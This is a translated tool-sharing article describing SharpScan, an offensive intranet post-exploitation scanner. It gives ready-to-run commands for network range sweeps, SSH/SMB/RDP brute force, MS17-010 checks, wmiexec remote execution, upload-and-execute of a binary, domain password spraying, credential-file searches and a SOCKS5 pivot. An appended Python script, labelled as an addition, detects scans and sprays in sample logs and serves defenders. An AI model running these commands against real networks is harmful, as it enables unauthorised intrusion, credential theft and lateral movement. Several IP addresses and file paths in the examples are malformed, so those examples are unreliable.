1. Tool features
2. Main functions
3. Compatibility
Windows: supports Win7 to Win11 and Windows Server 2008 to 2022
Linux: supports systems with glibc 2.17 or later
MacOS: arm x64_x86, intel_x64_86 (macOS 10.15 or later)
4. Usage
Usage: SharpScan [OPTIONS]
Options:
  -i, --icmp                 Perform icmp scan
  -a, --arp                  Perform arp scan
  -U, --udp                  Perform udp scan
  -h, --hTarget=VALUE        Target segment to scan
  -p, --ports=VALUE          Ports to scan (e.g. "0-1024" or "80,443,8080")
  -u, --username=VALUE       Username for authentication
      --pw, --password=VALUE Password for authentication
      --uf, --ufile=VALUE    Username file for authentication
      --pwf, --pwdfile=VALUE Password file for authentication
  -m, --mode=VALUE           Mode (e.g. ssh/smb/rdp/ftp/wmiexec/dcom/mysql/mssql/userenum/passwordspray)
  -f, --func=VALUE           wmiexec function (cmd/psh/upload/uploadexec)
  -c, --command=VALUE        Command execution
  -d, --delay=VALUE          Scan delay (ms), default: 10ms
  -t, --thread=VALUE         Maximum number of concurrent scans, default: 600
  -s, --search=VALUE         Search all files
  -l, --localfile=VALUE      The local file to upload
  -r, --remotefile=VALUE     The remote file path
      --socks5=VALUE         Open socks5 port
      --http=VALUE           Open SimpleHTTPServer port
      --folder=VALUE         SimpleHTTPServer folder
      --nopoc                Do not use proof of concept (POC)
  -o, --output=VALUE         Output file to save console output
      --help, --show         Show this usage and help
Example:
  SharpScan.exe -help
  SharpScan.exe -h 192.168.1.1/24
  SharpScan.exe -h C:ip.txt
  SharpScan.exe -h 192.168.1.1,192.168.1.3,192.168.1.4
  SharpScan.exe -h 192.168.1.107 -p 100-1024
4.1 Basic usage
Scan a /24 (class C) or /16 (class B) range; all modules are used by default.
SharpScan.exe -h 192.168.1.1/24 (scan a /24 range)
SharpScan.exe -h 192.168.1.1/16 (scan a /16 range)
SharpScan.exe -h 192.168.1.107,192.168.1.3,192.168.1.4 (scan the listed IPs, separated by commas)
SharpScan.exe -h C:\Windows\IP.txt (scan the IPs listed in IP.txt; the file format is the same as for the username/password lists)
SharpScan.exe -h 192.168.1.107 -p 100-1024 (port scan of a single IP)
4.2 Other functions
SharpScan.exe -h 192.168.244.1/24 -nopoc (host discovery and port scanning of the range only)
SharpScan.exe -s 192.168.244.169 -p 80-1024 -d 0 -m 600 (TCP port scan of ports 80-1024, 0 delay, maximum concurrency 600)
SharpScan.exe -t 192.168.244.141 -U -p 100-10000 (UDP port scan of ports 100-10000, 10 ms delay, maximum concurrency 600)
SharpScan.exe -h 192.168.244.1/24 -m ssh -u root -pw a (credential brute force of the SSH service across the /24, username root, password a)
SharpScan.exe -h 192.168.244.1/24 -m smb -u administrator -pw a (credential brute force of the SMB service across the /24, username administrator, password a)
SharpScan.exe -h 192.168.244.1/24 -m rdp -u administrator -pw a (credential brute force of the RDP service across the /24, username administrator, password a)
SharpScan.exe -h 192.168.244.1/24 -m smb -uf user.txt -pwf pass.txt (brute force the SMB service across the /24 with username and password lists)
SharpScan.exe -h 192.168.244.1/24 -m rdp -uf user.txt -pwf pass.txt (brute force the RDP service across the /24 with username and password lists)
SharpScan.exe -h 192.168.244.1/24 -m ssh -uf user.txt -pwf pass.txt (brute force the SSH service across the /24 with username and password lists)
SharpScan.exe -h 192.168.244.1/24 -m ms17010 (batch check of the /24 for ms17010)
SharpScan.exe -h 192.168.244.1/24 -m ssh -u root -pw a -c "uname-a" (run a command over SSH on every host in the /24)
SharpScan.exe -h 192.168.244.1.3 -m wmiexec -f cmd -c "ls C:\Windows" (remote command execution, with data passed through the registry)
SharpScan.exe -h 192.168.244.1.3 -m wmiexec -func upload -l C:a.exe -r C:\Windowsa.exe (upload a file to the remote host; -l is the local file path, -r is the destination path on the remote host)
SharpScan.exe -h 192.168.244.1.3 -m wmiexec -func uploadexec -l C:a.exe -r C:\Windowsa.exe (upload a file to the remote host and execute it)
SharpScan.exe -h 192.168.244.1.3 -m userenum -uf user.txt (enumerate usernames in the domain)
SharpScan.exe -h 192.168.244.1.3 -m passwordspray -uf user.txt -pw abc123$% (password spraying in the domain)
SharpScan.exe -h 192.168.244.1.3 -m passwordspray -uf user.txt -pwf pass.txt (password spraying in the domain)
SharpScan.exe -s "pass.txt" (silent search of all drives for pass.txt)
SharpScan.exe -socks5 8000 -u test -pw 1234 (SOCKS5 on port 8000, username test, password 1234)
SharpScan.exe -h 192.168.244.1/24 -o output.txt (export the scan results to output.txt)
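The behaviour listed above leaves a characteristic trace in network and authentication logs: one source touching the same service port on many hosts of a range within seconds (the range scans and brute-force modes), and one source producing failed logons for many distinct usernames against a single target in a short window (the passwordspray and userenum modes). The following Python script is an added example, not part of the SharpScan project or the original article; it runs two sliding-window detectors over a constructed set of log events (the format `src= dst= port= result= user=` and the thresholds of 20 hosts per minute and 5 users per ten minutes are assumptions chosen for illustration, to be tuned to the environment).

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real logs). Each line: ISO timestamp, then key=value fields.
SAMPLE_LOG = (
    # a horizontal scan: one source connects to port 445 on 25 hosts within 25 seconds
    [f"2024-05-01T10:00:{i:02d} src=192.168.244.50 dst=192.168.244.{100 + i} port=445 result=connect user=-"
     for i in range(25)]
    # a password spray: same source, one target, eight distinct users, one failure each
    + [f"2024-05-01T10:05:{i:02d} src=192.168.244.50 dst=192.168.244.10 port=445 result=auth_fail user=user{i}"
       for i in range(8)]
    # benign: a workstation authenticating normally to its file server
    + ["2024-05-01T10:06:00 src=192.168.244.77 dst=192.168.244.10 port=445 result=auth_ok user=alice"]
)


def parse_line(line: str) -> dict:
    """Turn one 'timestamp k=v k=v ...' line into a dict with a datetime and an int port."""
    ts, *fields = line.split()
    event = dict(f.split("=", 1) for f in fields)
    event["ts"] = datetime.fromisoformat(ts)
    event["port"] = int(event["port"])
    return event


def _sliding_window_alerts(events, key, distinct, threshold, window):
    """Group events by key(event); report each key whose events, inside any time
    window of length `window`, touch at least `threshold` distinct values of the
    `distinct` field. The reported number is the largest such count seen."""
    groups = defaultdict(list)
    for ev in events:
        groups[key(ev)].append(ev)
    alerts = {}
    for k, evs in groups.items():
        evs.sort(key=lambda e: e["ts"])
        start = 0
        for end in range(len(evs)):
            # advance the window start until the window no longer exceeds `window`
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            seen = {e[distinct] for e in evs[start:end + 1]}
            if len(seen) >= threshold:
                alerts[k] = max(alerts.get(k, 0), len(seen))
    return alerts


def detect_horizontal_scan(events, min_hosts=20, window=timedelta(seconds=60)):
    """One (src, port) reaching >= min_hosts distinct destinations within the window."""
    return _sliding_window_alerts(events, key=lambda e: (e["src"], e["port"]),
                                  distinct="dst", threshold=min_hosts, window=window)


def detect_password_spray(events, min_users=5, window=timedelta(minutes=10)):
    """One (src, dst) pair failing authentication for >= min_users distinct users within the window."""
    failures = [e for e in events if e["result"] == "auth_fail"]
    return _sliding_window_alerts(failures, key=lambda e: (e["src"], e["dst"]),
                                  distinct="user", threshold=min_users, window=window)


def analyze(lines):
    """Parse the lines and return both detectors' findings keyed by detector name."""
    events = [parse_line(ln) for ln in lines]
    return {"scan": detect_horizontal_scan(events), "spray": detect_password_spray(events)}


if __name__ == "__main__":
    for kind, hits in analyze(SAMPLE_LOG).items():
        for k, count in hits.items():
            print(f"{kind}: {k} -> {count} distinct values in window")
```

The scan detector keys on source and port rather than source alone so that a host legitimately talking to many peers on many ports is not confused with a single-service sweep; the spray detector keys on the source/target pair because a spray against a domain controller shows up as many users failing on one destination, which is the inverse of the many-attempts-on-one-user pattern that account lockout policies already catch.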
4.3 Video demo
🔄 Link
https://github.com/INotGreen/SharpScan
Originally published on the WeChat public account 不秃头的安全: Tool sharing | One-click automated, fileless post-exploitation intranet scanning tool
Disclaimer: the programs (methods) covered in this article may be offensive in nature and are provided solely for security research and teaching; readers who put this information to any other use bear full legal and joint liability, and this site bears none. For any questions, contact us by email (a corporate or other valid mailbox is recommended so the message is not blocked; contact details are on the home page).